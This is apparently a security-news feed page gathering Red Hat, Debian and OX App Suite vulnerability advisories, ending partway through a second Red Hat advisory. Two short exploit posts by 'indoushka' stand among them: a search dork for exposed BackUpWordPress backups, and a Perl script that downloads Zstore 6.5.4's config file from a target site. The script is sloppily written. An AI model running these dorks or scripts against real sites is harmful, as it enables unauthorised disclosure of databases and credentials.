Red Hat Security Advisory 2023-3771-01 - The VDSM service is required by a Virtualization Manager to manage the Linux hosts. VDSM manages and monitors the host's storage, memory and networks as well as virtual machine creation, other host administration tasks, statistics gathering, and log collection. Issues addressed include bypass, denial of service, and null pointer vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat Virtualization security and bug fix update  
Advisory ID:       RHSA-2023:3771-01  
Product:           Red Hat Virtualization  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3771  
Issue date:        2023-06-21  
CVE Names:         CVE-2023-20860 CVE-2023-20861   
=====================================================================

1. Summary:

An update is now available for Red Hat Virtualization 4 Tools for Red Hat  
Enterprise Linux 8, Red Hat Virtualization 4 for Red Hat Enterprise Linux  
8, and Red Hat Virtualization Engine 4.4.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4 - noarch  
Red Hat Virtualization 4 Hypervisor for RHEL 8 - noarch, x86_64  
Red Hat Virtualization 4 Management Agent for RHEL 7 Hosts - noarch, ppc64le, x86_64

3. Description:

The VDSM service is required by a Virtualization Manager to manage the  
Linux hosts. VDSM manages and monitors the host's storage, memory and  
networks as well as virtual machine creation, other host administration  
tasks, statistics gathering, and log collection.

The following packages have been upgraded to a later upstream version:  
ovirt-dependencies (4.5.3), ovirt-engine (4.5.3.8), vdsm (4.50.3.8).  
(BZ#2180717)

Security Fix(es):

* springframework: Security Bypass With Un-Prefixed Double Wildcard Pattern  
(CVE-2023-20860)

* springframework: Spring Expression DoS Vulnerability (CVE-2023-20861)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Previously, a host with Secure Intel Icelake Server Family could become  
non-operational because it did not provide the "taa-no" CPU feature.  
In this release, the check has been fixed in the Manager, and such hosts  
work properly. (BZ#2184623)

* Previously, when creating bonds on a host outside the Manager and adding  
the host without starting it, the Rx\Tx drop count is shown as null.  
As a result, a Null Pointer Exception is thrown in the Administration  
Portal > Compute > Hosts > Network Interfaces tab.  
With this release, null values are accepted, and there are no exceptions  
displayed in the Network Interfaces tab. (BZ#2180230)

* Previously, the Volume Extend Logic method skipped sparse volumes. As a  
result,  RAW sparse volumes (on file storage) were not extended properly.  
In this release, RAW sparse volumes are extended as expected. (BZ#2210036)

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/2974891

5. Bugs fixed (https://bugzilla.redhat.com/):

2180230 - Network Interfaces is broken if tx_drop or rx_drop are empty in the DB  
2180528 - CVE-2023-20860 springframework: Security Bypass With Un-Prefixed Double Wildcard Pattern  
2180530 - CVE-2023-20861 springframework: Spring Expression DoS Vulnerability  
2184623 - [RHV] Host Non-Operation after update Cluster CPU to Secure Intel Icelake Server. Missing CPU feature: taa-no  
2203132 - NullPointerException when creating a image transfer after a RHV-M reboot  
2210036 - Extend of the raw sparse disk (thin provisioned without incremental backup) is ignored

6. Package List:

Red Hat Virtualization 4 Management Agent for RHEL 7 Hosts:

Source:  
vdsm-4.50.3.8-1.el8ev.src.rpm

noarch:  
vdsm-api-4.50.3.8-1.el8ev.noarch.rpm  
vdsm-client-4.50.3.8-1.el8ev.noarch.rpm  
vdsm-common-4.50.3.8-1.el8ev.noarch.rpm  
vdsm-hook-cpuflags-4.50.3.8-1.el8ev.noarch.rpm  
vdsm-hook-ethtool-options-4.50.3.8-1.el8ev.noarch.rpm  
vdsm-hook-fcoe-4.50.3.8-1.el8ev.noarch.rpm  
vdsm-hook-localdisk-4.50.3.8-1.el8ev.noarch.rpm  
vdsm-hook-nestedvt-4.50.3.8-1.el8ev.noarch.rpm  
vdsm-hook-openstacknet-4.50.3.8-1.el8ev.noarch.rpm  
vdsm-hook-vhostmd-4.50.3.8-1.el8ev.noarch.rpm  
vdsm-http-4.50.3.8-1.el8ev.noarch.rpm  
vdsm-jsonrpc-4.50.3.8-1.el8ev.noarch.rpm  
vdsm-python-4.50.3.8-1.el8ev.noarch.rpm  
vdsm-yajsonrpc-4.50.3.8-1.el8ev.noarch.rpm

ppc64le:  
vdsm-4.50.3.8-1.el8ev.ppc64le.rpm  
vdsm-hook-checkips-4.50.3.8-1.el8ev.ppc64le.rpm  
vdsm-hook-extra-ipv4-addrs-4.50.3.8-1.el8ev.ppc64le.rpm  
vdsm-network-4.50.3.8-1.el8ev.ppc64le.rpm

x86_64:  
vdsm-4.50.3.8-1.el8ev.x86_64.rpm  
vdsm-gluster-4.50.3.8-1.el8ev.x86_64.rpm  
vdsm-hook-checkips-4.50.3.8-1.el8ev.x86_64.rpm  
vdsm-hook-extra-ipv4-addrs-4.50.3.8-1.el8ev.x86_64.rpm  
vdsm-network-4.50.3.8-1.el8ev.x86_64.rpm

Red Hat Virtualization 4 Hypervisor for RHEL 8:

Source:  
vdsm-4.50.3.8-1.el8ev.src.rpm

noarch:  
vdsm-hook-cpuflags-4.50.3.8-1.el8ev.noarch.rpm  
vdsm-hook-ethtool-options-4.50.3.8-1.el8ev.noarch.rpm  
vdsm-hook-fcoe-4.50.3.8-1.el8ev.noarch.rpm  
vdsm-hook-localdisk-4.50.3.8-1.el8ev.noarch.rpm  
vdsm-hook-nestedvt-4.50.3.8-1.el8ev.noarch.rpm  
vdsm-hook-openstacknet-4.50.3.8-1.el8ev.noarch.rpm  
vdsm-hook-vhostmd-4.50.3.8-1.el8ev.noarch.rpm

x86_64:  
vdsm-hook-checkips-4.50.3.8-1.el8ev.x86_64.rpm  
vdsm-hook-extra-ipv4-addrs-4.50.3.8-1.el8ev.x86_64.rpm

RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4:

Source:  
ovirt-dependencies-4.5.3-1.el8ev.src.rpm  
ovirt-engine-4.5.3.8-2.el8ev.src.rpm

noarch:  
ovirt-dependencies-4.5.3-1.el8ev.noarch.rpm  
ovirt-engine-4.5.3.8-2.el8ev.noarch.rpm  
ovirt-engine-backend-4.5.3.8-2.el8ev.noarch.rpm  
ovirt-engine-dbscripts-4.5.3.8-2.el8ev.noarch.rpm  
ovirt-engine-health-check-bundler-4.5.3.8-2.el8ev.noarch.rpm  
ovirt-engine-restapi-4.5.3.8-2.el8ev.noarch.rpm  
ovirt-engine-setup-4.5.3.8-2.el8ev.noarch.rpm  
ovirt-engine-setup-base-4.5.3.8-2.el8ev.noarch.rpm  
ovirt-engine-setup-plugin-cinderlib-4.5.3.8-2.el8ev.noarch.rpm  
ovirt-engine-setup-plugin-imageio-4.5.3.8-2.el8ev.noarch.rpm  
ovirt-engine-setup-plugin-ovirt-engine-4.5.3.8-2.el8ev.noarch.rpm  
ovirt-engine-setup-plugin-ovirt-engine-common-4.5.3.8-2.el8ev.noarch.rpm  
ovirt-engine-setup-plugin-vmconsole-proxy-helper-4.5.3.8-2.el8ev.noarch.rpm  
ovirt-engine-setup-plugin-websocket-proxy-4.5.3.8-2.el8ev.noarch.rpm  
ovirt-engine-tools-4.5.3.8-2.el8ev.noarch.rpm  
ovirt-engine-tools-backup-4.5.3.8-2.el8ev.noarch.rpm  
ovirt-engine-vmconsole-proxy-helper-4.5.3.8-2.el8ev.noarch.rpm  
ovirt-engine-webadmin-portal-4.5.3.8-2.el8ev.noarch.rpm  
ovirt-engine-websocket-proxy-4.5.3.8-2.el8ev.noarch.rpm  
python3-ovirt-engine-lib-4.5.3.8-2.el8ev.noarch.rpm  
rhvm-4.5.3.8-2.el8ev.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-20860  
https://access.redhat.com/security/cve/CVE-2023-20861  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJNw6tzjgjWX9erEAQh0DA//bldMneosPtyt2mmZt2cUEHTlWpFEQwcv  
nkqQyxlnlzV8iKFEure302JQub2sYKvZKxnifxt4q2dRNe1mIBP0/Y57tVQ88yck  
8nEZmTDUVEOAl92B1EKysRwnHrRfH9IRwtPNFvuB+11DK5veFKjFbMKDTw5R8znu  
Ec1EN9Cw40uo0uPZ2hsv4zpDLITOslteIvJUGmiAsqyi01R+vEeBKV8Wsc3eA6s+  
OvmMYHv4Qd1ikWcZZnEISpYJk2iLMyAbUUd1OREf80gS2YuEqZOIGeOZsbkL6blV  
ZM8uXFp4cpjL07QbAM/6OxFg0ApRrJ3WaK63Zual9MCx0rsKXJZrdrOMt30qhbT5  
I1aYUjoL3N0TzyyxantP6aqUSTOeTHwjJhCcmIK+TZpKJ0H3vsmhL2CNsC8zs1MG  
PrJDHqgbllsXWGo82W6tE5yPWf4MUeveGkVLbC+6rl1GStLpZvApXqm3Puw+Zd3T  
eQ3YkgZVTJAHw+JpXHJVGtUR3hHzqKOE7rXQjlIGLn7tofmtW2y4iFNM7iguGPXX  
wi8BzHYX6CKVyVH50kI8H8d17rMGVhrS+o0YwAzRYI89sh57aaqXt3zg19YG/DgW  
cFDorjZym/MHOVfyyb1FEuY9yI/9nQ76+XokSYq1hW8Za96RplSXxQ9zhqy89/7j  
/SLthjTKl/g=  
=sLnh  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3771-01

Debian Linux Security Advisory 5436-1 - Gregor Kopf of Secfault Security GmbH discovered that HSQLDB, a Java SQL database engine, allowed the execution of spurious scripting commands in .script and .log files. Hsqldb supports a "SCRIPT" keyword which is normally used to record the commands input by the database admin to output such a script. In combination with LibreOffice, an attacker could craft an odb containing a "database/script" file which itself contained a SCRIPT command where the contents of the file could be written to a new file whose location was determined by the attacker.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5436-1                   security@debian.orghttps://www.debian.org/security/                          Markus KoschanyJune 21, 2023                         https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : hsqldb1.8.0CVE ID         : CVE-2023-1183Gregor Kopf of Secfault Security GmbH discovered that HSQLDB, a Java SQLdatabase engine, allowed the execution of spurious scripting commands in.script and .log files. Hsqldb supports a "SCRIPT" keyword which is normallyused to record the commands input by the database admin to output such ascript. In combination with LibreOffice, an attacker could craft an odbcontaining a "database/script" file which itself contained a SCRIPT commandwhere the contents of the file could be written to a new file whose locationwas determined by the attacker.For the oldstable distribution (bullseye), this problem has been fixedin version 1.8.0.10+dfsg-10+deb11u1.For the stable distribution (bookworm), this problem has been fixed inversion 1.8.0.10+dfsg-11+deb12u1.We recommend that you upgrade your hsqldb1.8.0 packages.For the detailed security status of hsqldb1.8.0 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/hsqldb1.8.0Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmSTbaNfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFDRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7UeQVTg//R6xPJvWIgXS52aaxr0ZAsjmmKgROqyRekmbNWv0tHiPvctpk1NcxRhkqSbUZid8oYTlnOqq3AY4/22LoW6KbgCun+ZtAF0sFU4tKI8LjLFDQREJcZ5eB5Sv7o1BvOSH9MVE7EZv5CFKe0lAyfbD51Cys58sKAf4JTlbO3wEigi4IYTrxAiQzcV/Eb0a1dYKsQP5kh5mTlcL7nLC5wKWBaGQVXGI/lXum4C2t/rLCQyMkgVNedaXmkNK6zk5iyAZ1VVDIAHw/nPiAAf6bMvzUmpQ3GBOmeyZ8X3XA4xJw9Y4nywKUNBZzt4ndpuCNyK+6pK9zHpt7zrsiJXRBNL6a+Fjuf66Ral9zjgAsCbQYEE5MgTRbEOUQaXInyEvKfXtJk1uOMC9Z8kwDQSLYYbfOskuNTarRwoZxRTj1ZVHjfCsaXY3UMzmBZZVyuu18jdkZpFlf4B8lhsPUZAL2csQTD8AIsfeXYHaCA5/tTeJhAxNh0UvbLzDYNpK2UeBJiOrLY7qNyzQv2y+pG5o7XPcG409mU3t2kF7gXBi3ntfImHFkyNgusUU21CHPQLOT9cnt05aSij2H1iEWs3iYX8v67thNSYb1fwc7+yXpAgMx7uBtR97gUxJr/ghvwG9TZcudFj6B7qyAoA7x+3gbt0ULSAZsTxZgQXsu0t72GKqK/X0==rINr-----END PGP SIGNATURE-----

Debian Security Advisory 5436-1

OX App Suite suffers from server-side request forgery, command injection, uncontrolled resource consumption, code injection, authorization bypass, and insecure storage vulnerabilities. Various versions in the 7.10.x and 8.x branches are affected.

Internal reference: MWB-1994  
Type: CWE-922 (Insecure Storage of Sensitive Information)  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite backend 7.10.6-rev39  
First fixed revision: OX App Suite backend 7.10.6-rev40  
Discovery date: 2023-01-09  
Solution date: 2023-03-10  
Disclosure date: 2023-06-20  
Researcher credits: Tim 'foobar7' Coen  
CVE: CVE-2023-26427  
CVSS: 3.2 (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N)

Details:  
Weak default permissions for noreply.properties. Default permissions for a properties file were too permissive.

Risk:  
Local system users could read potentially sensitive information. No publicly available exploits are known.

Solution:  
We updated the default permissions for noreply.properties set during package installation.

---

Internal reference: MWB-2008  
Type: CWE-639 (Authorization Bypass Through User-Controlled Key)  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite backend 7.10.6-rev39, OX App Suite backend 8.9  
First fixed revision: OX App Suite backend 7.10.6-rev40, OX App Suite backend 8.10  
Discovery date: 2023-01-17  
Solution date: 2023-03-10  
Disclosure date: 2023-06-20  
Researcher credits: Tim 'foobar7' Coen  
CVE: CVE-2023-26428  
CVSS: 6.5 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

Details:  
Access to other users signatures is not checked. Attackers can successfully request arbitrary snippet IDs, including E-Mail signatures of other users within the same context.

Risk:  
Signatures of other users could be read even though they are not explicitly shared. No publicly available exploits are known.

Solution:  
We improved permission handling when requesting snippets that are not explicitly shared with other users.

---

Internal reference: MWB-2019  
Type: CWE-77 (Improper Neutralization of Special Elements used in a Command ('Command Injection'))  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite backend 7.10.6-rev39, OX App Suite backend 8.10  
First fixed revision: OX App Suite backend 7.10.6-rev40, OX App Suite backend 8.11  
Discovery date: 2023-01-23  
Solution date: 2023-03-09  
Disclosure date: 2023-06-20  
Researcher credits: Tim 'foobar7' Coen  
CVE: CVE-2023-26429  
CVSS: 3.5 (CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:L/A:N)

Details:  
User-feedback not sanitized for control characters. Control characters were not removed when exporting user feedback content.

Risk:  
This allowed attackers to include unexpected content via user feedback and potentially break the exported data structure. No publicly available exploits are known.

Solution:  
We now drop all control characters that are not whitespace character during the export.

---

Internal reference: MWB-2038  
Type: CWE-918 (Server-Side Request Forgery (SSRF))  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite backend 7.10.6-rev39, OX App Suite backend 8.10  
First fixed revision: OX App Suite backend 7.10.6-rev40, OX App Suite backend 8.11  
Discovery date: 2023-02-07  
Solution date: 2023-03-16  
Disclosure date: 2023-06-20  
Researcher credits: Mehmet 'mdisec' Ince  
CVE: CVE-2023-26431  
CVSS: 5.0 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Details:  
SSRF through bypassing denylists via IPV4-mapped IPv6 addresses. IPv4-mapped IPv6 addresses did not get recognized as "local" by the code and a connection attempt is made.

Risk:  
Attackers with access to user accounts could use this to bypass existing deny-list functionality and trigger requests to restricted network infrastructure to gain insight about topology and running services. No publicly available exploits are known.

Solution:  
We now respect possible IPV4-mapped IPv6 addresses when checking if contained in a deny-list.

---

Internal reference: MWB-2046  
Type: CWE-400 (Uncontrolled Resource Consumption)  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite backend 7.10.6-rev39, OX App Suite backend 8.10  
First fixed revision: OX App Suite backend 7.10.6-rev40, OX App Suite backend 8.11  
Discovery date: 2023-02-13  
Solution date: 2023-03-13  
Disclosure date: 2023-06-20  
CVE: CVE-2023-26432  
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L)

Details:  
SMTP capabilities allow excessive memory usage. When adding an external mail account, processing of SMTP "capabilities" responses are not limited to plausible sizes.

Risk:  
Attacker with access to a rogue SMTP service could trigger requests that lead to excessive resource usage and eventually service unavailability. No publicly available exploits are known.

Solution:  
We now limit accepted SMTP server response to reasonable length/size.

---

Internal reference: MWB-2047  
Type: CWE-400 (Uncontrolled Resource Consumption)  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite backend 7.10.6-rev39, OX App Suite backend 8.10  
First fixed revision: OX App Suite backend 7.10.6-rev40, OX App Suite backend 8.11  
Discovery date: 2023-02-13  
Solution date: 2023-03-13  
Disclosure date: 2023-06-20  
CVE: CVE-2023-26433  
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L)

Details:  
IMAP capabilities allow excessive memory usage. When adding an external mail account, processing of IMAP "capabilities" responses are not limited to plausible sizes.

Risk:  
Attacker with access to a rogue IMAP service could trigger requests that lead to excessive resource usage and eventually service unavailability. No publicly available exploits are known.

Solution:  
We now limit accepted IMAP server response to reasonable length/size.

---

Internal reference: MWB-2048  
Type: CWE-400 (Uncontrolled Resource Consumption)  
Component: backend  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite backend 7.10.6-rev39  
First fixed revision: OX App Suite backend 7.10.6-rev40  
Discovery date: 2023-02-13  
Solution date: 2023-03-13  
Disclosure date: 2023-06-20  
CVE: CVE-2023-26434  
CVSS: 4.3 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L)

Details:  
POP3 capabilities allow excessive memory usage. When adding an external mail account, processing of POP3 "capabilities" responses are not limited to plausible sizes.

Risk:  
Attacker with access to a rogue POP3 service could trigger requests that lead to excessive resource usage and eventually service unavailability. No publicly available exploits are known.

Solution:  
We now limit accepted POP3 server response to reasonable length/size.

---

Internal reference: DOCS-4662  
Type: CWE-918 (Server-Side Request Forgery (SSRF))  
Component: office  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite office 7.10.6-rev7  
First fixed revision: OX App Suite office 7.10.6-rev8  
Discovery date: 2023-01-09  
Solution date: 2023-03-13  
Disclosure date: 2023-06-20  
Researcher credits: Icare  
CVE: CVE-2023-26435  
CVSS: 5.0 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N)

Details:  
SSRF using ODT files and "draw" XML fragments. It was possible to call filesystem and network references using the local LibreOffice instance using manipulated ODT documents.

Risk:  
Attackers could discover restricted network topology and services as well as including local files with read permissions of the open-xchange system user. This was limited to specific file-types, like images. No publicly available exploits are known.

Solution:  
We have improved existing content filters and validators to avoid including any local resources.

---

Internal reference: DOCS-4701  
Type: CWE-94 (Improper Control of Generation of Code ('Code Injection'))  
Component: office  
Report confidence: Confirmed  
Solution status: Fixed by vendor  
Last affected revision: OX App Suite office 7.10.6-rev7  
First fixed revision: OX App Suite office 7.10.6-rev8  
Discovery date: 2023-02-03  
Solution date: 2023-03-13  
Disclosure date: 2023-06-20  
Researcher credits: Mehmet 'mdisec' Ince  
CVE: CVE-2023-26436  
CVSS: 8.3 (CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)

Details:  
Insecure Deserialization on documentconverterws API lead to Remote Code Execution. Attackers with access to the "documentconverterws" API were able to inject serialized Java objects, that were not properly checked during deserialization. Access to this API endpoint is restricted to local networks by default.

Risk:  
Arbitrary code could be injected that is being executed when processing the request. No publicly available exploits are known.

Solution:  
A check has been introduced to restrict processing of legal and expected classes for this API. We now log a warning in case there are attempts to inject illegal classes.

OX App Suite SSRF / Resource Consumption / Command Injection

WordPress BackUpWordPress version 3.8 appears to leave backups in a world accessible directory under the document root.

    ====================================================================================================================================| # Title     : WordPress BackUpWordPress 3.8 Plugins Backup Disclosure Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://wordpress.org/plugins/backupwordpress/                                                                     |  | # Dork      : "/wp-content/backupwordpress- "                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave backups in a world accessible directory under the document root.[+] Use Dork : "/wp-content/backupwordpress- "[+] The search result gives you some websites that took earlier a Wordpress backup.[+] http://127.0.0.1/WordPress3/wp-content/backupwordpress-89c0bd0079-backups/====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

WordPress BackUpWordPress 3.8 Backup Disclosure

Zstore version 6.5.4 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : Zstore version 6.5.4 Database Disclosure Exploit                                                                   |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : https://github.com/leon-mbs/zstore/releases/tag/6.5.4                                                              |    
| # Dork      : "Zippy склад"                                                                                                      |  
====================================================================================================================================

poc :

[-] Download database backup :

    This file may disclose sensitive information. This information can be used to launch further attacks.

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
# Author : indoushka

use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print "\n[+] Zstore version 6.5.4  Database Disclosure [+] \n\n";  
system('color a');

if(@ARGV < 2)  
{  
print "[+] Author : indoushka \n\n";  
print "[-] How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/db.sql \n";  
print "[+] usage2 : perl $0 localhost /db.sql \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="config/config.ini";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/db.sql");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/.env\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

Zstore 6.5.4 Database Disclosure

Red Hat Security Advisory 2023-3741-01 - The c-ares C library defines asynchronous DNS requests and provides name resolving API. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: c-ares security update  
Advisory ID:       RHSA-2023:3741-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3741  
Issue date:        2023-06-21  
CVE Names:         CVE-2023-32067   
=====================================================================

1. Summary:

An update for c-ares is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

The c-ares C library defines asynchronous DNS (Domain Name System) requests  
and provides name resolving API.

Security Fix(es):

* c-ares: 0-byte UDP payload Denial of Service (CVE-2023-32067)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2209502 - CVE-2023-32067 c-ares: 0-byte UDP payload Denial of Service

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
c-ares-1.10.0-3.el7_9.1.src.rpm

x86_64:  
c-ares-1.10.0-3.el7_9.1.i686.rpm  
c-ares-1.10.0-3.el7_9.1.x86_64.rpm  
c-ares-debuginfo-1.10.0-3.el7_9.1.i686.rpm  
c-ares-debuginfo-1.10.0-3.el7_9.1.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
c-ares-debuginfo-1.10.0-3.el7_9.1.i686.rpm  
c-ares-debuginfo-1.10.0-3.el7_9.1.x86_64.rpm  
c-ares-devel-1.10.0-3.el7_9.1.i686.rpm  
c-ares-devel-1.10.0-3.el7_9.1.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
c-ares-1.10.0-3.el7_9.1.src.rpm

x86_64:  
c-ares-1.10.0-3.el7_9.1.i686.rpm  
c-ares-1.10.0-3.el7_9.1.x86_64.rpm  
c-ares-debuginfo-1.10.0-3.el7_9.1.i686.rpm  
c-ares-debuginfo-1.10.0-3.el7_9.1.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:  
c-ares-debuginfo-1.10.0-3.el7_9.1.i686.rpm  
c-ares-debuginfo-1.10.0-3.el7_9.1.x86_64.rpm  
c-ares-devel-1.10.0-3.el7_9.1.i686.rpm  
c-ares-devel-1.10.0-3.el7_9.1.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
c-ares-1.10.0-3.el7_9.1.src.rpm

ppc64:  
c-ares-1.10.0-3.el7_9.1.ppc.rpm  
c-ares-1.10.0-3.el7_9.1.ppc64.rpm  
c-ares-debuginfo-1.10.0-3.el7_9.1.ppc.rpm  
c-ares-debuginfo-1.10.0-3.el7_9.1.ppc64.rpm  
c-ares-devel-1.10.0-3.el7_9.1.ppc.rpm  
c-ares-devel-1.10.0-3.el7_9.1.ppc64.rpm

ppc64le:  
c-ares-1.10.0-3.el7_9.1.ppc64le.rpm  
c-ares-debuginfo-1.10.0-3.el7_9.1.ppc64le.rpm  
c-ares-devel-1.10.0-3.el7_9.1.ppc64le.rpm

s390x:  
c-ares-1.10.0-3.el7_9.1.s390.rpm  
c-ares-1.10.0-3.el7_9.1.s390x.rpm  
c-ares-debuginfo-1.10.0-3.el7_9.1.s390.rpm  
c-ares-debuginfo-1.10.0-3.el7_9.1.s390x.rpm  
c-ares-devel-1.10.0-3.el7_9.1.s390.rpm  
c-ares-devel-1.10.0-3.el7_9.1.s390x.rpm

x86_64:  
c-ares-1.10.0-3.el7_9.1.i686.rpm  
c-ares-1.10.0-3.el7_9.1.x86_64.rpm  
c-ares-debuginfo-1.10.0-3.el7_9.1.i686.rpm  
c-ares-debuginfo-1.10.0-3.el7_9.1.x86_64.rpm  
c-ares-devel-1.10.0-3.el7_9.1.i686.rpm  
c-ares-devel-1.10.0-3.el7_9.1.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
c-ares-1.10.0-3.el7_9.1.src.rpm

x86_64:  
c-ares-1.10.0-3.el7_9.1.i686.rpm  
c-ares-1.10.0-3.el7_9.1.x86_64.rpm  
c-ares-debuginfo-1.10.0-3.el7_9.1.i686.rpm  
c-ares-debuginfo-1.10.0-3.el7_9.1.x86_64.rpm  
c-ares-devel-1.10.0-3.el7_9.1.i686.rpm  
c-ares-devel-1.10.0-3.el7_9.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-32067  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJNw6tzjgjWX9erEAQiWwg/+JVyAtdRGZxI7+8nKBI29g3PpJY/w/HEw  
BEv+sBSiRKHJUMJ5z+Ahr2N+wQppZN893jZi78vpIdw2BG/nZuGe9Gb3Rd1/uB19  
